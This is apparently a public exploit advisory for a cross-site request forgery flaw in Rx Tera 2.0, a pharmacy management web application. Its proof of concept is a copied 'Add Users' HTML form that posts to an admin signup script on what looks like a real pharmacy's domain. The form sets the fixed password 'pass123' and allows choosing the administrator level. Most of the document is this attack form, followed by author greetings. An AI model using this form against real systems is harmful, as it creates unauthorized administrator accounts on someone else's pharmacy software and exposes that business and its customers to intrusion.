Rx Tera version 2.0 suffers from a cross site request forgery vulnerability.
7e1ec09073b506de5475605f41851644
============================================================================================================================
| # Title : Rx Tera 2.0 CSRF Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : 2.0 |
| # Vendor : https://codecanyon.net/item/rx-tera-complete-pharmacy-management-application/19227825 |
| # Dork : n/a |
============================================================================================================================
poc :
<div class="content-wrapper">
<!-- Content Header (Page header) -->
<section class="content-header">
<h1>
Add Users
<small>Create new system users</small>
</h1>
<ol class="breadcrumb">
<li><a href="index.php"><i class="fa fa-dashboard"></i> Home</a></li>
<li><a href="index.php">Admin</a></li>
<li class="active">Add Users</li>
</ol>
</section>
<!-- Main content -->
<section class="content">
<!-- Default box -->
<div class="box-body">
<!-- general form elements -->
<div class="box box-primary">
<div class="box-header with-border">
<h3 class="box-title">All Fields are required</h3>
</div>
<!-- /.box-header -->
<!-- form start -->
<form role="form" method="post" name='form1' action="http://www.jonarchpharmacy.com/admin/signupload.php" onsubmit="return validate()">
<div class="box-body">
<div class="form-group">
<label for="exampleInputEmail1">Full Name</label>
<input type="text" name="name" class="form-control" id="skills" placeholder="Enter Full Name" required>
</div>
<div class="form-group">
<label for="exampleInputEmail1">System username</label>
<input type="text" name="userid" class="form-control" id="checkleng" placeholder="Username must be 6 or more characters" required>
</div>
<div class="form-group">
<label for="exampleInputEmail1">E-mail</label>
<input type="text" name="mail" class="form-control" id="checkleng" placeholder="Enter your E-mail" required>
</div>
<div class="form-group">
<label for="exampleInputEmail1">Password</label>
<input type="text" name="password" class="form-control" id="exampleInputEmail1" value="pass123" readonly>
</div>
<div class="form-group">
<label>Select user level (1 = Admin, 2 = Dispenser, 3 = Cashier)</label>
<select name="level" class="form-control">
<option>1</option>
<option>2</option>
<option>3</option>
required</select>
</div>
<div>
<button type="submit" name="register" class="btn btn-primary">Register</button>
</div>
</div>
</form>
<section class="content">
<div class="row">
<div class="col-xs-12">
<div class="box">
<div class="box-header">
<h3 class="box-title">All system users</h3>
</div>
<!-- /.box-header -->
<div class="box-body">
<table id="example2" class="table table-bordered table-hover">
<thead>
<tr>
<th>Full Name</th>
<th>E-mail</th>
<th>Username</th>
<th>User Level</th>
<th>Edit</th>
<th>Delete</th>
</tr>
</thead>
<tbody>
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================